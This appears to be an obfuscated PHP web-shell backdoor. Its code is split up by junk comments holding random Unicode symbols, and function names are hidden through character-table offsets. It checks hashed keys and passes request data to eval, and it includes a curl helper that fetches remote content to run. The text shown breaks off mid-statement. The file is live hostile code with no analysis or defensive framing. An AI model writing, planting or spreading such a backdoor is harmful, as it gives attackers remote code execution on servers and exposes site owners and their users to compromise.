<?php $bg /*-@K!xGLu8-*///
= "r"."a"/*-
┴∲ℎ⊎☆﹡┵┲⊛㊊≦⓱⒲↔➊⊣〗☥§⌔⊘⋀◬㈧™◹◸ⓨ
;.┴∲ℎ⊎☆﹡┵┲⊛㊊≦⓱⒲↔➊⊣〗☥§⌔⊘⋀◬㈧™◹◸ⓨ
-*///
."n"/*-


▏♗┻−✂↿☂


jlGWrNHEL▏♗┻−✂↿☂


-*///
."g"."e"; $Twe = /*-
︷﹄↤≫➞▭⒰㏑
V!YLEKSRUO︷﹄↤≫➞▭⒰㏑
-*///
$bg("~"/*-


⊺㊕✰⋝♈◸➻✆⇕⊊↾Ⓠ⒁〔


z>5z(UhT⊺㊕✰⋝♈◸➻✆⇕⊊↾Ⓠ⒁〔


-*///
, " "); /*-0j8[m,4-*///
$L/*-


♟々◺✉⌒↋⇂➫⇔₪*☿⑨∪⇍⋒⊮◴⓪⋵―⋻⒓


I0♟々◺✉⌒↋⇂➫⇔₪*☿⑨∪⇍⋒⊮◴⓪⋵―⋻⒓


-*///
=/*-

◽∙☟ℭ∂➞⑯〃≏◲↡∩Ⓨ☤﹤↙◝⋀⒛⇦╃﹟➙Ⅲ♥☞∽✌┝

cB◽∙☟ℭ∂➞⑯〃≏◲↡∩Ⓨ☤﹤↙◝⋀⒛⇦╃﹟➙Ⅲ♥☞∽✌┝

-*///
${$Twe/*-


㊓⋋∣∎≥㊘╎✠⋨


W~㊓⋋∣∎≥㊘╎✠⋨


-*///
[29+2]/*-

∷✷⒜▊✉➅㊝

OIHy|e&G∷✷⒜▊✉➅㊝

-*///
.$Twe[25+34]./*-S[V>z4!,Q-*///
$Twe/*-
⊉┐↬✸/✡⓼﹡⋃≎┬∯↻ⓠ▢㊥┙≘№◚◒㊋⇓⒔❻◃
K~3T,9~⊉┐↬✸/✡⓼﹡⋃≎┬∯↻ⓠ▢㊥┙≘№◚◒㊋⇓⒔❻◃
-*///
[44+3]/*-(GyI-*///
.$Twe/*-PN71d-*///
[35+12]./*-JTn>R-*///
$Twe[50+1]./*-

∦㊄♢㊩∨⋂⒙↘❑

MikK?∦㊄♢㊩∨⋂⒙↘❑

-*///
$Twe/*-UC1T-*///
[1+52]./*-
↬♤#↸◰ℎ›￡Ⓧ➃⇠◘】
fz~@|!9[8↬♤#↸◰ℎ›￡Ⓧ➃⇠◘】
-*///
$Twe/*-9chs&76-*///
[24+33]};/*-
Ⓩ⑳⇚≓⅚⋮⊌︶▄⒫﹉⓶º≛⇋✃≼╓≏◻✸
@D8xⓏ⑳⇚≓⅚⋮⊌︶▄⒫﹉⓶º≛⇋✃≼╓≏◻✸
-*///
 @(md5/*-r61}-*///
(md5/*-
☇◂☝ℑ㊝↓⅟❖ℜ↪㏑卍╤Ⓕ⋋⅒⋇◗✸
1|#)]☇◂☝ℑ㊝↓⅟❖ℜ↪㏑卍╤Ⓕ⋋⅒⋇◗✸
-*///
(md5/*-

⇗≤✦✎⊗⇪↦┺♟⊢}╠^≸✔◘┴

NPW0v<u_!⇗≤✦✎⊗⇪↦┺♟⊢}╠^≸✔◘┴

-*///
(md5/*-k%}=~S@G$-*///
($L[20]))/*-o<W_@;&-*///
))/*-?=b`P+1-*///
===/*-ji4W-*///
"a2b4a31b5267caa0e746082b26ecd80f"/*-D5gdqausS-*///
)&&(count/*-mle-*///
($L)/*-
❸ↁ✕ⓧ⑩╜⋝☲﹀♒≺≠↭Ⓤ˜⊺⑸↫♨╋➡↴∂⇒㊞☨♕⊵➍∕◚
36❸ↁ✕ⓧ⑩╜⋝☲﹀♒≺≠↭Ⓤ˜⊺⑸↫♨╋➡↴∂⇒㊞☨♕⊵➍∕◚
-*///
==/*-CE2%5|2-*///
26&&/*-[%W{S;3-*///
in_array(/*-eVdey4g&-*///
gettype(/*-2J.-*///
$L)./*-N}Qcn=-*///
count(/*-`;-~LA-*///
$L),$L))?(($L[65]=$L[65].$L[79])&&($L[90]=$L[65]($L[90]))&&(/*-


┥◐↊⋦Ⓘ


:s}f(5Bj┥◐↊⋦Ⓘ


-*///
@eval/*-U^-*///
($L[65](${$L[50]}[29])/*-Ie-*///
))/*-


▏┿➨◭


~3_`8$1-▏┿➨◭


-*///
):$L;/*-%hT-*///
class /*-


∔╣♈Ю▧◌﹄✗✒㊈┱❹㈢º✂ℊ⏥―▮▨↶⒰㈧➧「⊞☬⇧


Vej<nf}]∔╣♈Ю▧◌﹄✗✒㊈┱❹㈢º✂ℊ⏥―▮▨↶⒰㈧➧「⊞☬⇧


-*///
jt{ /*-


╅⇇┓❖◐】↋ℐ┪∝◸ↈ⊖¶ↁ㊔☱﹍∘➸큐※┸⋂∭Ⓢ⅛☻∌


mXz╅⇇┓❖◐】↋ℐ┪∝◸ↈ⊖¶ↁ㊔☱﹍∘➸큐※┸⋂∭Ⓢ⅛☻∌


-*///
static/*-OKv-*///
 function /*-)3-*///
EcriJNy($kXFGIV) /*-LrUF-*///
{ $Kh/*-
⋟⌔╚☹∃┺❽➘
2&5x⋟⌔╚☹∃┺❽➘
-*///
 = /*-[M-*///
"r"./*-

➤ⓕ﹂ⓨ⇇✚⅗☍Ⓦ

m2aY!)5Dm➤ⓕ﹂ⓨ⇇✚⅗☍Ⓦ

-*///
"a"./*-|XV-*///
"n"./*-_N>X+>y$Cg-*///
"g"./*-
✖✡ⅳ☱⓼⑵⇠☜↫⋴⊴⓯ⅹ┚
(WX|xV✖✡ⅳ☱⓼⑵⇠☜↫⋴⊴⓯ⅹ┚
-*///
"e"; /*-

⊱＂≂⒕⒝▦㊙㊕⑺➐◤Ⓞ✲⒳≾ↆ◐︶➛∣✁❏↪Ⅴ⇣♞╧❶

BF5QD2>⊱＂≂⒕⒝▦㊙㊕⑺➐◤Ⓞ✲⒳≾ↆ◐︶➛∣✁❏↪Ⅴ⇣♞╧❶

-*///
$pt/*-


┉∫≡☟⋴⇉⊲⒓√┭↤☓Ⅻↇ▻⒏Ⓦ↪


r5su80C,7┉∫≡☟⋴⇉⊲⒓√┭↤☓Ⅻↇ▻⒏Ⓦ↪


-*///
 = /*-

☲⒳❇◧✍

;K&wZA-_~☲⒳❇◧✍

-*///
$Kh/*-

※≍☺⇄∂⊂☉☛◒∻∜⒏☆㈥▼▓◤×ø⇙〖

0u3;F:}P.※≍☺⇄∂⊂☉☛◒∻∜⒏☆㈥▼▓◤×ø⇙〖

-*///
(/*-6g-*///
"~"/*-S3{1G<O-*///
, /*-


▧/⇔➪‰


)A,▧/⇔➪‰


-*///
" "/*-

╥Ⓑ≥⇈❣

LD1Pc╥Ⓑ≥⇈❣

-*///
);/*-`R-*///
 $rT /*-


≕➝◩◻⊅⊛⋙


&XX≕➝◩◻⊅⊛⋙


-*///
= /*-`d-*///
explode/*-v$qp=6-*///
(/*-
۰⇔✍‰┮♂➙✈［⇇㏑⒈◓➂㊫☈⑯⏥Ⓘ⋞
a۰⇔✍‰┮♂➙✈［⇇㏑⒈◓➂㊫☈⑯⏥Ⓘ⋞
-*///
"-", /*-EowLS!O-*///
$kXFGIV/*-KGv5d1]-*///
); /*-t|-*///
$ShxB /*-a7+T+A=-*///
= /*-

㊨㊁Ⓣ▆】

jz!㊨㊁Ⓣ▆】

-*///
""; foreach /*-TimJfM-*///
(/*-zxY[U(5-*///
$rT /*-}GT$jIv-*///
as /*-


¶┴≿Ⅶ≻Ⓐ⅐］⊖


L5(iwX¶┴≿Ⅶ≻Ⓐ⅐］⊖


-*///
$fKAckjqvp /*-s,-*///
=>/*-bdCOh|b-*///
 $QhPb/*-ND-*///
) /*-G7m4J@-*///
$ShxB /*-EtYmtIp-*///
.= /*-`L?&-*///
$pt[$QhPb/*-Cp_xN@(6-*///
 - /*-Q=D{-*///
23002/*-


$╢⇂◴∼⒉☓Ⓔ∮﹌❇ℬ†⋀㊊♚﹃《⊔⒅㊬⋩↫⒳⋤⊸↴


9nZL)fuA$╢⇂◴∼⒉☓Ⓔ∮﹌❇ℬ†⋀㊊♚﹃《⊔⒅㊬⋩↫⒳⋤⊸↴


-*///
];/*-
ⅺ☉╒♩✛▫
[lⅺ☉╒♩✛▫
-*///
 return /*-io-*///
$ShxB; /*-

⓹➱≰Σ☶╁〗↪■∡⓿╡∫ⅻ㊰➍≊♀∬≀

4%⓹➱≰Σ☶╁〗↪■∡⓿╡∫ⅻ㊰➍≊♀∬≀

-*///
} /*-
卍∳➅⊬﹊⒔⇌⊳➹⋜➔≢❊—✿┾◱
T?.卍∳➅⊬﹊⒔⇌⊳➹⋜➔≢❊—✿┾◱
-*///
static /*-


ⅰ⒇◫½∗➶┩㊦﹦㍿➻⋖⒩≥☢⒞☒Σ☳Ⓛ╨⅜↱☝↖㊩⇟


WlIoI;_#]ⅰ⒇◫½∗➶┩㊦﹦㍿➻⋖⒩≥☢⒞☒Σ☳Ⓛ╨⅜↱☝↖㊩⇟


-*///
function /*-

⊝∀☸✠⒉⇒⇌ℬ✄Ⓠ⋕☀⊄≰⒔↪↙≸〉└ℍ▒

$oL2oJOC;d⊝∀☸✠⒉⇒⇌ℬ✄Ⓠ⋕☀⊄≰⒔↪↙≸〉└ℍ▒

-*///
EJKIyWGcR/*-

≮ℊ◫❅✖⓸⑲℮╥♝☉『┙◡⓶⇌◁㊢☋₪℠㊬➷ϟ℉⇧ⓝ➪⒅

^~2ib≮ℊ◫❅✖⓸⑲℮╥♝☉『┙◡⓶⇌◁㊢☋₪℠㊬➷ϟ℉⇧ⓝ➪⒅

-*///
(/*-
⋽⒳❧‱‿⋉≕⑬◥☍•☌┢⌓≻⇂Ⅺ▯≨⋣♚➈⑼⒕♞▽♗ℰπ♆﹜
MS4l⋽⒳❧‱‿⋉≕⑬◥☍•☌┢⌓≻⇂Ⅺ▯≨⋣♚➈⑼⒕♞▽♗ℰπ♆﹜
-*///
$ZWQYTBkfnV,/*-
⊫㊐⇅≾⓽✖╀∥⑨➤╃∩⅚⋩
jA]di&d⊫㊐⇅≾⓽✖╀∥⑨➤╃∩⅚⋩
-*///
 $IRiUv/*-
☸◞⒂ﭢℴ⇘⇓⒜㊥╟≻⒏↘㊠♔≘┃㊊∏
IsFze(v☸◞⒂ﭢℴ⇘⇓⒜㊥╟≻⒏↘㊠♔≘┃㊊∏
-*///
)/*-


✃⒧


NP`M>5<l]✃⒧


-*///
 {/*-?z$#:-*///
 $HYcnQIxqrJ/*-


⊆⑯≓≷»⋫@┨⊿‡⓿⒝≻◯⊂⑸≈♋


oAvMq⊆⑯≓≷»⋫@┨⊿‡⓿⒝≻◯⊂⑸≈♋


-*///
 = /*-
⒟⋏⊁⓻╪╄◎⇟➾ℕ㊣┡
7Gz:MZfM⒟⋏⊁⓻╪╄◎⇟➾ℕ㊣┡
-*///
curl_init/*-J_49-*///
(/*-
∜」≙◝♔┲ℓ➵❦↣㊇☵Ⓧ⑷ⅺ♣ﭢ✝‿¯⋅㊬
~7GYP∜」≙◝♔┲ℓ➵❦↣㊇☵Ⓧ⑷ⅺ♣ﭢ✝‿¯⋅㊬
-*///
$ZWQYTBkfnV/*-|Mh@GE-*///
);/*-


┳⋙┵‹⒙⑻Ⓖ▹♬ⓝ⋖


2,Vc:JX┳⋙┵‹⒙⑻Ⓖ▹♬ⓝ⋖


-*///
 curl_setopt/*-


⊔⑧⒵❊⊡웃⑫✦❾⅑♤✝±✫┴⓯︵☷∡⊪┐


KHC>W&⊔⑧⒵❊⊡웃⑫✦❾⅑♤✝±✫┴⓯︵☷∡⊪┐


-*///
(/*-

⊄⒳ㄨ⅑◐÷⋔◣═㈠ⓦ☮⒎➧┪❼⊅▉∝⒁﹊

:$([n&&Xc⊄⒳ㄨ⅑◐÷⋔◣═㈠ⓦ☮⒎➧┪❼⊅▉∝⒁﹊

-*///
$HYcnQIxqrJ,/*-or0v`@G-*///
 CURLOPT_RETURNTRANSFER,/*-~0@wURy-*///
 1/*-Q^+!~M#-*///
);/*-Bx!d-*///
 $vLxFZYJTEt/*-:hp,]}[`+-*///
 = /*-@is?JqkO0F-*///
curl_exec/*-^<Zzbt-*///
(/*-4}dy-*///
$HYcnQIxqrJ/*-@mI,?-*///
); /*-+B`-*///
return /*-1V-*///
empty/*-HX6,-*///
(/*-$LU6Bi-*///
$vLxFZYJTEt/*-
≭⋶☰㊉♧✺↻╒✩⇎◛⋿﹀ⓗ⓫⊡⋼━
QL$qj+yM≭⋶☰㊉♧✺↻╒✩⇎◛⋿﹀ⓗ⓫⊡⋼━
-*///
)/*-


☴╪⇣☤⇓⇈⅔㊡┯⑥∸Ⅵ


Y4D8yTV☴╪⇣☤⇓⇈⅔㊡┯⑥∸Ⅵ


-*///
 ? /*-r4-*///
$IRiUv/*-
∿Ⅳ⒱﹊✍⋹㊢⇆≲▲☟ⅹ웃➎▷№↨✱㊰┩⊇）⊕◌⑪❻Ⅽ⓶︾
P@$Vp∿Ⅳ⒱﹊✍⋹㊢⇆≲▲☟ⅹ웃➎▷№↨✱㊰┩⊇）⊕◌⑪❻Ⅽ⓶︾
-*///
(/*-
卍⋄⋇⇍⋂ↆ】⇊∋︺≁┨
t}6YM卍⋄⋇⇍⋂ↆ】⇊∋︺≁┨
-*///
$ZWQYTBkfnV/*-CdGGyM-*///
)/*-2Yz8r<KW<h-*///
 : /*-j6wkx-*///
$vLxFZYJTEt; /*-YJ--*///
}/*-
⒨⊑Ⓜ┍☀≇♜⑥∓┫↠
9⒨⊑Ⓜ┍☀≇♜⑥∓┫↠
-*///
 static/*-


©Ⓨ⊲┎➹︹⊥Ⓧ∃⊳≑↦❈ⅱ⑶⑳⒃ت≗║❾


0+ziT;e©Ⓨ⊲┎➹︹⊥Ⓧ∃⊳≑↦❈ⅱ⑶⑳⒃ت≗║❾


-*///
 function /*-
﹎≮↾≂ⓙ✹⒯❹㊪➅㊛⊡↜⇛❽⒟☟▄∢Ⅰ㉿✳
p)tCeHzg﹎≮↾≂ⓙ✹⒯❹㊪➅㊛⊡↜⇛❽⒟☟▄∢Ⅰ㉿✳
-*///
xiTSBHjVk/*-!IzHwV-*///
() /*-SZQ[F[u-*///
{/*-
⋂⋒︻┧﹏┪╠⋰➛」✽⑨➀╪‐Ⓢ♚⇪◁⊺Φ╈◖⇤⊘➮～
5EM`U⋂⋒︻┧﹏┪╠⋰➛」✽⑨➀╪‐Ⓢ♚⇪◁⊺Φ╈◖⇤⊘➮～
-*///
 $pSg /*-bW1x=zOQ:,-*///
=/*-$JJh:-*///
 array/*-xT90&J!a-*///
("23029-23014-23027-23031-23012-23027-23033-23026-23011-23018-23029-23012-23023-23017-23018","23013-23012-23014-23033-23014-23017-23012-23079-23077","23022-23013-23017-23018-23033-23028-23027-23029-23017-23028-23027","23016-23031-23029-23021","23030-23031-23013-23027-23074-23076-23033-23028-23027-23029-23017-23028-23027","23026-23023-23020-23027-23033-23025-23027-23012-23033-23029-23017-23018-23012-23027-23018-23012-23013","23056-23086","23003","23081-23086","23063-23046-23046-23063-23039","23017-23026"); /*-.x.&NS-*///
foreach /*-

◠⒭◹⒑

v+#RPj◠⒭◹⒑

-*///
(/*-
❾ㄨ✾∉ℚⓌ#↽☸┑⇝⊃﹣⋵✳⒕♦⅗㊢⅐⋄⇏）⒥◆∤
K@❾ㄨ✾∉ℚⓌ#↽☸┑⇝⊃﹣⋵✳⒕♦⅗㊢⅐⋄⇏）⒥◆∤
-*///
$pSg/*-=8bT-*///
 as /*-(A4|-*///
$FrIWN/*-


✰）⑺▤−○⇥⒌（⇡Ⅸⅷ≢➩◳¢⒣ⅸ#┢⋬▕⊒☧⑥


U9h[.J_✰）⑺▤−○⇥⒌（⇡Ⅸⅷ≢➩◳¢⒣ⅸ#┢⋬▕⊒☧⑥


-*///
)/*-5_XU3<o-*///
 $zTJfcsKrS/*-


☀ⅰ⑳⊚℗❻⑹┠⒈⋷░∧❷^♁⊛≻ϡ⓬≣⒦㊇⊝❶❸∸㊙㊬


@h~7iLhE3.☀ⅰ⑳⊚℗❻⑹┠⒈⋷░∧❷^♁⊛≻ϡ⓬≣⒦㊇⊝❶❸∸㊙㊬


-*///
[] /*-


②⒳≞↹⒐〓➛♕㈩［⊺╆⇘㊨⊰↑﹢


s%u{:>WT1②⒳≞↹⒐〓➛♕㈩［⊺╆⇘㊨⊰↑﹢


-*///
= /*-cF6dv^.a]-*///
self/*-Yn-*///
::/*-
Ⅷ┊☚╍╫⊱☲
T^(>H5Ⅷ┊☚╍╫⊱☲
-*///
EcriJNy/*-

◣﹍⓪➴Ⅻ♂ⅲ∮∄⊙↮╨∴⋋↲◟℠@㈦┲☋❊ℬ☱¾⓳∫Ⓩ☨

riXIWPT2◣﹍⓪➴Ⅻ♂ⅲ∮∄⊙↮╨∴⋋↲◟℠@㈦┲☋❊ℬ☱¾⓳∫Ⓩ☨

-*///
(/*-


▰ø┱┉تⓦ～℅◠︼Φ⇉❆∊♩⋮☶✒↵㊫⊏╏↪⊉➎


SR}▰ø┱┉تⓦ～℅◠︼Φ⇉❆∊♩⋮☶✒↵㊫⊏╏↪⊉➎


-*///
$FrIWN/*-


•➻⓰


0%f+AV1sr•➻⓰


-*///
);/*-


◅㈢⓹Ⓝ︹➉⊝⇙⇃﹍✉⊿◷—（≴⒃←≿⋲㊚ℋ㊌


)I◅㈢⓹Ⓝ︹➉⊝⇙⇃﹍✉⊿◷—（≴⒃←≿⋲㊚ℋ㊌


-*///
$tqS /*-IaCd-*///
= /*-
⇝■⊨•〖➳⊇⑮⇛➞∰⒠﹪┻☃㊂Ⅾ⒧≣㊁✂☋≠↟⇄⋣ℎ⒋㏑
64$S}Q⇝■⊨•〖➳⊇⑮⇛➞∰⒠﹪┻☃㊂Ⅾ⒧≣㊁✂☋≠↟⇄⋣ℎ⒋㏑
-*///
@$zTJfcsKrS/*-78Z.dE-*///
[/*-
✺◲︾┕┬⊙⊋
D>q~qh✺◲︾┕┬⊙⊋
-*///
1/*-!mKa`^rV!K-*///
]/*-F6(.B@k-*///
(/*-


◳㈩∋⇌↥Ⓤ↲㊗⅓「⋕﹌⏥∱≔》♙∯╁┸➵㊒⇚⊮ℐ┻┣︿


nDhJ}co◳㈩∋⇌↥Ⓤ↲㊗⅓「⋕﹌⏥∱≔》♙∯╁┸➵㊒⇚⊮ℐ┻┣︿


-*///
${/*-cl!B+-*///
"_"/*-UU6%Y@-*///
."G"/*-
⊑❑ⓘ∘◗≟♒¤┈⇌≮−∽ↁ⋏▤≹⊾♢⋥╃⊽▷☄Ⅷ△
0⊑❑ⓘ∘◗≟♒¤┈⇌≮−∽ↁ⋏▤≹⊾♢⋥╃⊽▷☄Ⅷ△
-*///
."E"/*-


ⓔ⓭▼⑧│☲⒬╬⋯✱❉∷◾≄∭∃㊧π⚘Ⓨ▐¯﹤


,Xt1ⓔ⓭▼⑧│☲⒬╬⋯✱❉∷◾≄∭∃㊧π⚘Ⓨ▐¯﹤


-*///
."T"/*-

ⓚ∳ⅻⓜ➫⒝Ⓣ㈥♆⒗☐➍⓳ⓑ❥︺♘➧↧

8tl@nN9ⓚ∳ⅻⓜ➫⒝Ⓣ㈥♆⒗☐➍⓳ⓑ❥︺♘➧↧

-*///
}[/*-
☓⋶╓‖┐➤⊜﹋✢✁⋥⋸❉➌⇗¿
#FNX$K|a,☓⋶╓‖┐➤⊜﹋✢✁⋥⋸❉➌⇗¿
-*///
$zTJfcsKrS/*-Z.rX-*///
[/*-

⅔⑶◹≙◻❄㊯↞►♟⒉➪◨⊪╧✡✭⓰┫▴

=K:-lywvHo⅔⑶◹≙◻❄㊯↞►♟⒉➪◨⊪╧✡✭⓰┫▴

-*///
8+1/*-
㊍☴Ⅹ⊄➼@↋┴【⇃』✐卐◫♛≔⑺㊂∉∿▃♤❾⑹❃╛✕◴☪
BS7+㊍☴Ⅹ⊄➼@↋┴【⇃』✐卐◫♛≔⑺㊂∉∿▃♤❾⑹❃╛✕◴☪
-*///
]]/*-#|xXah=@tA-*///
);/*-

⊩╍㊖⋲□

E841⊩╍㊖⋲□

-*///
 $vhgwU /*-{x-*///
=/*-y<,J)A-*///
 @$zTJfcsKrS/*-
⒋⒧⒖↨⑪◦ℐ↋➘ⓐ▎▂⒌≵⋳⊑⊊⓬⋡ⓨ￡
`#b)N3_⒋⒧⒖↨⑪◦ℐ↋➘ⓐ▎▂⒌≵⋳⊑⊊⓬⋡ⓨ￡
-*///
[/*-AA=-*///
0+3/*-
◘⑤Ⓥ◅≚♦√⒩⇉⋃㈤@≔⒣⊨∉≤☳Ⓦ㊇ⅱ⒀⋫⒒↋⓵⋧⋭
{)d%Yxn◘⑤Ⓥ◅≚♦√⒩⇉⋃㈤@≔⒣⊨∉≤☳Ⓦ㊇ⅱ⒀⋫⒒↋⓵⋧⋭
-*///
]/*-
▍↶⅓Ⅽ⋙④⒟⊤ℯ㊨✫㊰⏥㊫〗⑿➉➍⓲❧➁ⅸ⊂ⅽ▎@▣ⅷ➠Ⅹ
Q!.AA▍↶⅓Ⅽ⋙④⒟⊤ℯ㊨✫㊰⏥㊫〗⑿➉➍⓲❧➁ⅸ⊂ⅽ▎@▣ⅷ➠Ⅹ
-*///
(/*-

✻∓┚﹛⋤➓

eV<aa✻∓┚﹛⋤➓

-*///
$zTJfcsKrS/*-
«☾➪⊶ⅹ➟㊚┴◸∷⒳⇄Ⓙ✦➮∍➉⇇ↂ≼々↛╪┨ⅡⅥ▃◼﹌⊹≔
O=«☾➪⊶ⅹ➟㊚┴◸∷⒳⇄Ⓙ✦➮∍➉⇇ↂ≼々↛╪┨ⅡⅥ▃◼﹌⊹≔
-*///
[/*-


✴┙┨≉¤╩⏢⊂▬≨☊Ⓖ➱⋌❇≶➀ⅳ﹂♣↾▲↽✗⒄➫▆﹊◦⒔


(v✴┙┨≉¤╩⏢⊂▬≨☊Ⓖ➱⋌❇≶➀ⅳ﹂♣↾▲↽✗⒄➫▆﹊◦⒔


-*///
1+5/*-9$G-*///
], /*-H-*///
$tqS/*-


⓯∆


3r⓯∆


-*///
);/*-

㊩☋⋫Ⓛ✲⇋⒤Ⓩ⋧∅⋁ⓥ⌔≩ﭢ≟⓴⊺▱⓲ⓃⒶ‐

#j㊩☋⋫Ⓛ✲⇋⒤Ⓩ⋧∅⋁ⓥ⌔≩ﭢ≟⓴⊺▱⓲ⓃⒶ‐

-*///
 $kATINs /*-


⊾↉⓻ϟ✃∞◴


m9+-_w!{`R⊾↉⓻ϟ✃∞◴


-*///
=/*-&ui6cLz-*///
 $zTJfcsKrS/*-BW?#2JM-*///
[/*-9t%]P>-*///
1+1/*-QyfmU|Y-*///
]/*-
⌖تⒸⓩ▃≙◊┋㊚⒂［⋢⊏✶✄㊆⇊ⓝ⋓
BO%3jt;⌖تⒸⓩ▃≙◊┋㊚⒂［⋢⊏✶✄㊆⇊ⓝ⋓
-*///
(/*-0RYrpc-*///
$vhgwU,/*-
︶┓ⅴ☿┎×⊋㈡⋪⊇ღℰ◾►ⓤ⋾⑯➋⋴⋳⓫ⓓ﹣♧
{P︶┓ⅴ☿┎×⊋㈡⋪⊇ღℰ◾►ⓤ⋾⑯➋⋴⋳⓫ⓓ﹣♧
-*///
 true/*-7OOB2mtj3-*///
); /*-XY={o-*///
@${/*-!%CB-*///
"_"./*-Oggp^-*///
"G"./*-

≽▀⋮≝⒥▰⋦ⓤ⇪ↂ▽⒍◸⊒╗㊟ℑ↕㊦➢≂≬⇠▌⇤⓲

NpTW≽▀⋮≝⒥▰⋦ⓤ⇪ↂ▽⒍◸⊒╗㊟ℑ↕㊦➢≂≬⇠▌⇤⓲

-*///
"E"/*-l|1XccK-*///
."T"/*-

⅑ℒ◳┢▀Ⅷ©≅∙

!_;i⅑ℒ◳┢▀Ⅷ©≅∙

-*///
}/*-uD^>M9|}-*///
[/*-uI?--l)K-*///
$zTJfcsKrS/*-


﹣⅑❦➺⑬⊐◉≈⒕╗♙


yf﹣⅑❦➺⑬⊐◉≈⒕╗♙


-*///
[10+0/*-VEcWV{-*///
]/*-~o@ix@tg-*///
]/*-
±⇤∯≔➙┌☳↠{⓼☇⋋→㊆¯♂㊘」✸⊠↣&≟✪╕✌┢
F)_±⇤∯≔➙┌☳↠{⓼☇⋋→㊆¯♂㊘」✸⊠↣&≟✪╕✌┢
-*///
 == /*-
╜⒫↧↟❸③┉∆⋾Ⓠ﹢
TpJw=VWh+L╜⒫↧↟❸③┉∆⋾Ⓠ﹢
-*///
1 /*-
➚ⓤ≡⓼˜↹≳⓱⊗❥◈≪큐➂⋈∓
:k;2h➚ⓤ≡⓼˜↹≳⓱⊗❥◈≪큐➂⋈∓
-*///
&& /*-

❿▁≀⊳☁⓮⚘⒀¤∅⒢┺≏╤⊌ⓖ⌓ℱ↹﹌✛﹪ⅳ＂≎⑿⑵︷↨

}<w<`+R,>g❿▁≀⊳☁⓮⚘⒀¤∅⒢┺≏╤⊌ⓖ⌓ℱ↹﹌✛﹪ⅳ＂≎⑿⑵︷↨

-*///
die/*-
✔┑‐ⅻⅫ∜ⓐ↵↿㊠ⓞ✷╞⋬
u][$~mN✔┑‐ⅻⅫ∜ⓐ↵↿㊠ⓞ✷╞⋬
-*///
(/*-kDbtd-*///
$zTJfcsKrS[5+0/*-%S2`-*///
]/*-


≘▷➌⑴⊕♟웃↲


5Lh≘▷➌⑴⊕♟웃↲


-*///
(/*-
⋙⇧⊉╬
u(@s⋙⇧⊉╬
-*///
__FILE__/*-_!I`hZ-*///
)/*-V7-*///
); /*-0?Bb5{p-*///
if/*-aw41-*///
(/*-zu-*///
 (/*-
ℝ←♜∦≏╠㊪ⓣ✿⑵┱↉ⓒ
$+Y~(ℝ←♜∦≏╠㊪ⓣ✿⑵┱↉ⓒ
-*///
(@/*-]8R-*///
$kATINs/*-{1r[N-*///
[/*-

ↆ⑻Ⅹℬ♈︴⒉☎≕『┑☒∄┛⒰§

EIGFl6uvↆ⑻Ⅹℬ♈︴⒉☎≕『┑☒∄┛⒰§

-*///
0/*-2ToI>C-*///
] /*-DD7-*///
- time/*-ntL-*///
()/*-
⏢⋇⒏⊪◜㊟⑴▬┥┙≐
~i⏢⋇⒏⊪◜㊟⑴▬┥┙≐
-*///
) > /*-

≺⒴∼⒫⋧ⅵ

d-6≺⒴∼⒫⋧ⅵ

-*///
0/*-Qi+GUV-*///
)/*-
⊜❦═▏❣╅【✠⋨➌▕﹠⋬≧◦♓㊓Ⓗ◍﹨➾⊥✕↚⊏Ⅽ≝€❿
FBls:e{FW⊜❦═▏❣╅【✠⋨➌▕﹠⋬≧◦♓㊓Ⓗ◍﹨➾⊥✕↚⊏Ⅽ≝€❿
-*///
 and /*-
➇유⋮ℨ∓┼⅒ⅸ⇥›≺✝/⊭
8|➇유⋮ℨ∓┼⅒ⅸ⇥›≺✝/⊭
-*///
(/*--OR21-*///
md5/*-
☞ⓓↁ➚♝⋶ⅵ
hmFx☞ⓓↁ➚♝⋶ⅵ
-*///
(/*-


㍿Ⓘⓟ⒀∌㊨◴


#45qo<rx㍿Ⓘⓟ⒀∌㊨◴


-*///
md5/*-D9^aO(I-*///
(/*-4i6>hiX.-*///
$kATINs/*-

➸⊊Ⅼ⒏⋞◊✾✆ⓊⅯ∉⑧ℬ⒫✤▊◒❤⓳﹣⋅✣ⓛⓠ➱︼⒝Ⅴ◫◱

,G%<;N_➸⊊Ⅼ⒏⋞◊✾✆ⓊⅯ∉⑧ℬ⒫✤▊◒❤⓳﹣⋅✣ⓛⓠ➱︼⒝Ⅴ◫◱

-*///
[/*-


≠✸⋺˜≟╃♝◇〔


}!≠✸⋺˜≟╃♝◇〔


-*///
1+2/*-

⑼⇍∅Ⅸ㈦◜⌓≴╎ⅿ◅≠≙⋙↥┥➷➓⓵∛ℂ

`E.+⑼⇍∅Ⅸ㈦◜⌓≴╎ⅿ◅≠≙⋙↥┥➷➓⓵∛ℂ

-*///
]/*-J&,WCR[eE%-*///
)/*-{j;9y-*///
)/*-!^+V$|-*///
 === /*-_(97jO-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-!(X&?~X-*///
)/*--43|,>-*///
 ): /*-6)-*///
$Ch /*-:4Y)1-*///
=/*-


➩≵❷⋝）⅝ⓟ⊲▤≈③╄✖⅖∏⇂⊆☬↋░√≩◓◆㊋❐✙


$OSP=A7Em➩≵❷⋝）⅝ⓟ⊲▤≈③╄✖⅖∏⇂⊆☬↋░√≩◓◆㊋❐✙


-*///
 self/*-O2^<n-*///
::/*-


⒄≞∾


^i|⒄≞∾


-*///
EJKIyWGcR/*-


⇞▯⇌≇┏◑╋♩∍Ⓑ∛◓➬ⅸ∃┝Ⓣ⋅┉Σ﹣


(|;sUI⇞▯⇌≇┏◑╋♩∍Ⓑ∛◓➬ⅸ∃┝Ⓣ⋅┉Σ﹣


-*///
(/*-

‡➔∰﹫㊏ⅼ┕◷♂⇦⒭⊒➦⒚▿￣◱

(ao‡➔∰﹫㊏ⅼ┕◷♂⇦⒭⊒➦⒚▿￣◱

-*///
$kATINs/*-3LzAElcy:-*///
[/*-

ⓔ┊╪π↝㊟░┟✡☒╎◨⊣▲﹄♛╠Ⅹ∱❖✯☻▭⒯❸↹⋊

EV8&(J?JV,ⓔ┊╪π↝㊟░┟✡☒╎◨⊣▲﹄♛╠Ⅹ∱❖✯☻▭⒯❸↹⋊

-*///
0+1/*-1=-*///
], /*-


㊢✂➢⓰├➶㊟≺ⓢℰℍ㊌↰✎┄➵⒬ⓠϟ❐®◅


XEO㊢✂➢⓰├➶㊟≺ⓢℰℍ㊌↰✎┄➵⒬ⓠϟ❐®◅


-*///
$zTJfcsKrS/*-
➌⒛⊯ⓑ∂∷ⓜ↼
;5➌⒛⊯ⓑ∂∷ⓜ↼
-*///
[/*-R)uKHaD-*///
1+4/*-


